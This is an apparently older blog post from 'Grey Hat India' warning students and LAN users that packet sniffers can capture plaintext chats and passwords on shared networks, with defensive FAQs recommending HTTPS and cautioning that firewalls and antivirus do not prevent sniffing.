Grey Hat India

If you're new here, you may want to subscribe to my RSS feed. Thanks for visiting!

Imagine!

After a hard day long classroom session at your college campus, you come back to your hostel room day to find your college dean and some cops standing at your door , all red in fury. Well why ?

Someone gave them a tip-off that you’re storing illegal CREDIT card information /Terrorist information on your email. You’re sure that you didn’t indulge in any such activity and try to prove that by showing your email inbox and machine.

Alas, you find that there are several files that contain database of stolen
Credit cards, Doomed !

You have been using hard to guess passwords and changing them regularly. How could someone have gotten access to your account to use it for this activity? One likely possibility is that you have been a victim of a password sniffer attack.

Someone probably sniffed and revengefully attached those files to land you in trouble.

We get victimized by our assumptions—-> Just because some established brand says that X will secure you doesn’t mean it will. They are just words. This false sense of security, an illusion created by the big Symantecs and MacAfees around is the real problem.

You see, that is internet, a network. Antivirus/Firewalls can protect you from attacks coming onto
your machine; they are least bothered with what you’re doing on internet. And that’s the real juicy spot for the blackhat hacker.

You’re online and reading these posts, via internet, which is by concept a network of wire meshes.
In principle is WiFi too is nothing but a wireless version of the same wired network topology-
which inadvertently is vulnerable. Whether you’re subscribed to the local cable internet walah, or a
LAN inside your office you might be totalled.

The whole point is about understanding the basics that lie behind the TCP/IP protocol. All the network-data can be seen as packets flowing around which can be snooped.

Take for example an experiment I did yesterday, I ran up a sniffer program in the Windows environ to see what might be flowing through my Local Area Network.

One can intercept chat conversations at will. Google Talk, MSN , Yahoo,Rediff India do not use SSL or any encryption to secure the Chats. So your amorous private conversation with your girlfriend, or serious ones with business affiliates might be just seen in plain by a malicious attacker sitting somewhere in his room having a cuppa.

Not much to surprise, the passwords could easily be seen travelling in plaintext.

To understand how a sniffer works, you require knowing a rule: Every computer on LAN can see what all packets are being sent/received on other computers (So 1000s of computers in my LAN are vulnerable to one single sniffer with you). For doing that, you just need to configure your NIC card in promiscuous mode, all modern sniffers will do that for you .

Dynamite was invented by Alfred Nobel to for the good of human kind, now it has evolved
into a serious mass-destructor. Sniffers were invented for white hat purpose like to troubleshoot
faulty equipment and monitor network traffic.

Hackers also use these tools to peer inside a network. However, they’re are not aimed at troubleshooting. Instead, they are motivated to glean passwords and other gems.

Some data is easily readable, while some data is not. The difference is in the type of data that is sent. Computers can send information either in plain text or in an encrypted form.

The image above shows just how easy it is to read captured plaintext passwords.

In India, All IITs, and college campuses deploy LANs to distribute internet among, which again,
by principle is not a safe environment.

Common FAQ that might arise after reading this short piece of text:

• Am I safe doing my business transactions via internet on LAN?

Quite safe as of now. All the leading Internet transactions are facilitated using
CRYPTOGRAPHY embedded in their WebPages. Security certificates and SSL is a good
protection from getting sniffed in the LAN environs.

• Does my latest firewall or antivirus protect me against such type of attacks?

Heck, no! Firewalls are only good when it comes to inbound attack security. The hacker
might not be able to intrude your machine, or send viruses/Trojans. Firewalls/AVs are
defunct after the data escapes your machine and enters the Network, any
snooping eye can catch hold of it.

• Any protections?

100 percent security is myth. For now make sure you use secure logins. (The ones
having a https in front, to ensure your data is being encrypted).

Another good security measure would be to avoid LAN based internet if internet is used for sensitive work.

Go for BSNL ADSL, Airtel ADSL broadband internet, they’re much more secure.
When a hacker gathers encrypted data, it’s generally useless for him, unless he takes the pain to
demystify the key by using BRUTEFORCE and Dictionary type attacks. Very few crackers adopt this,
due to the amount of time involved in complex mathematical attacks.

You see, cryptography when deployed with good local antivirus etc. generally creates a good
secure legion. Well, nothing can be done if an idiot gets phished to those Nigerian
million dollar emails.

After all as ancient saying goes, Humans are the weakest links in security.

Till next time
Hail open source
Anirudh Sharma

References
• Zen and the Art of Information Security
• Backtrack Operating System